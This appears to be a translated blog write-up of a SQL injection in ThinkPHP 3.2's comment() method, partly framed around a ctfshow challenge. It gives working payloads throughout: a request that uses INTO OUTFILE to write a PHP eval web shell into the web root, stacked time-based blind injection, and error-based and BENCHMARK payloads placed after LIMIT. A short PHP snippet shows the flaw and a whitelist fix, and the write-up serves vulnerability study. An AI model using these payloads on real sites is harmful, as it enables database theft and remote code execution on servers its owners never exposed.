ThinkPHP v3.2 comment annotation injection write shell
2022-06-30 14:20:00 【Ff. cheng】
Vulnerability Details
The comment() method attaches a query comment to the SQL that is built. Because the comment value is spliced into the statement as-is, a user-controlled comment can be used to write a shell or for time-based blind injection.
Vulnerability reproduction
Write a demo controller:
$user = M('Users')->comment($id)->find(intval($id));
Payload:
?id=1*/ into outfile "/var/www/html/3.php" LINES STARTING BY '<?php eval($_POST[0]);?>'/*

Vulnerability analysis
First look at the function call stack:

Start debugging step by step.
Follow into the comment() method.
It adds the comment we passed in to $options.
The intermediate steps are the same as in the ThinkPHP 3.2.3 find() injection analysis; continue down into the select() method.
Following in, it operates on the model and bind entries of $options, which has no effect here.
Follow into buildSelectSql(), which starts building the SQL statement.
Follow into parseSql().
It parses the comment entry of $options.
Follow in.
The comment we passed in is wrapped in /* */; by closing the opening comment marker and reopening a comment at the end, we can inject.
Try it first:

In the constructed SQL statement the injection point is after LIMIT 1, in other words:
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT [ Injection point ]
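The mechanism above, as an added example (not ThinkPHP's own code): buildSelect() is a simplified stand-in for buildSelectSql()/parseSql() that appends the comment() value unescaped inside /* */ after LIMIT, and safeComment() is an assumed hardening helper that keeps request data from closing the comment.

```php
<?php
// Added example, not ThinkPHP's own code. buildSelect() is a simplified
// stand-in for buildSelectSql()/parseSql(): it appends the comment() value,
// unescaped, inside /* */ after LIMIT, the behaviour analysed above.
function buildSelect(string $table, int $id, string $comment): string
{
    $sql = "SELECT * FROM `{$table}` WHERE `id` = {$id} LIMIT 1";
    if ($comment !== '') {
        $sql .= ' /* ' . $comment . ' */';
    }
    return $sql;
}

// Hardened variant (assumed helper, not part of ThinkPHP): request data has
// no business in comment() at all; if a comment must be derived from it,
// accept only a short whitelist so "*/", quotes and keywords can never reach
// the SQL text. Anything else is dropped.
function safeComment(?string $comment): string
{
    if ($comment === null || !preg_match('/^[A-Za-z0-9_ .\-]{1,64}$/', $comment)) {
        return '';
    }
    return $comment;
}

// Constructed request parameter in the shape of the write-up's payloads:
// it closes the comment, adds a stacked statement, then reopens a comment.
$rawId = '1*/; SELECT SLEEP(3) /*';

// Vulnerable: the raw parameter reaches comment() as in the demo controller.
// The printed statement shows the comment closed right after "1" and the
// stacked SELECT sitting outside it, where the driver will execute it.
echo buildSelect('users', intval($rawId), $rawId), PHP_EOL;

// Hardened: the same parameter is filtered first, so the comment is simply
// dropped and the statement ends at LIMIT 1.
echo buildSelect('users', intval($rawId), safeComment($rawId)), PHP_EOL;
```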
So how can this be exploited?
Stacked time-based blind injection
In a local test, stacked queries can be used for time-based blind injection:
1*/;select if(substr(database(),1,1)='s',sleep(3),0)/*

In the ctfshow challenge environment
Injection methods after LIMIT
MySQL injection methods after LIMIT | leavesongs.com
Exploitation when the MySQL injection point is after the LIMIT keyword - On that day ws
This method applies to MySQL 5.x, for injection after the LIMIT clause.
First look at the SELECT syntax:
SELECT
[ALL | DISTINCT | DISTINCTROW ]
[HIGH_PRIORITY]
[STRAIGHT_JOIN]
[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
select_expr [, select_expr ...]
[FROM table_references
[WHERE where_condition]
[GROUP BY {col_name | expr | position}
[ASC | DESC], ... [WITH ROLLUP]]
[HAVING where_condition]
[ORDER BY {col_name | expr | position}
[ASC | DESC], ...]
[LIMIT {[offset,] row_count | row_count OFFSET offset}] -- here
[PROCEDURE procedure_name(argument_list)]
[INTO OUTFILE 'file_name' export_options
| INTO DUMPFILE 'file_name'
| INTO var_name [, var_name]]
[FOR UPDATE | LOCK IN SHARE MODE]]
According to the article, there are two approaches:
After the LIMIT keyword, PROCEDURE and INTO may follow. INTO can be used to write files when the database user has write permission. Look at PROCEDURE first: the only stored procedure MySQL provides by default is ANALYSE (doc).
PROCEDURE
Error-based injection, payload:
mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'
Time-based blind injection:
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)
INTO
Try to use INTO OUTFILE to write a shell. DUMPFILE can also write files, but it takes no additional parameters (export_options), and those are the key to exploiting INTO OUTFILE.
Look at the following parameters:
SELECT ... INTO OUTFILE 'file_name'
[CHARACTER SET charset_name]
[export_options]
export_options:
[{FIELDS | COLUMNS}
[TERMINATED BY 'string'] -- separator
[[OPTIONALLY] ENCLOSED BY 'char']
[ESCAPED BY 'char']
]
[LINES
[STARTING BY 'string']
[TERMINATED BY 'string']
]
The export options are optional; the possible values are:
`FIELDS TERMINATED BY 'string'`: sets the string used as the separator between fields; it may be one or more characters. The default is "\t".
`FIELDS ENCLOSED BY 'char'`: sets the character used to enclose field values; it must be a single character. By default no character is used.
`FIELDS OPTIONALLY ENCLOSED BY 'char'`: sets the character used to enclose CHAR, VARCHAR and TEXT character fields. By default no character is used.
`FIELDS ESCAPED BY 'char'`: sets the escape character; it must be a single character. The default is "\".
`LINES STARTING BY 'string'`: sets the string placed at the beginning of each line of data; it may be one or more characters. By default no string is used.
`LINES TERMINATED BY 'string'`: sets the string placed at the end of each line of data; it may be one or more characters. The default is "\n".
Final payload:
/?id=1*/ into outfile "/var/www/html/3.php" LINES STARTING BY '<?php eval($_POST[0]);?>'/*
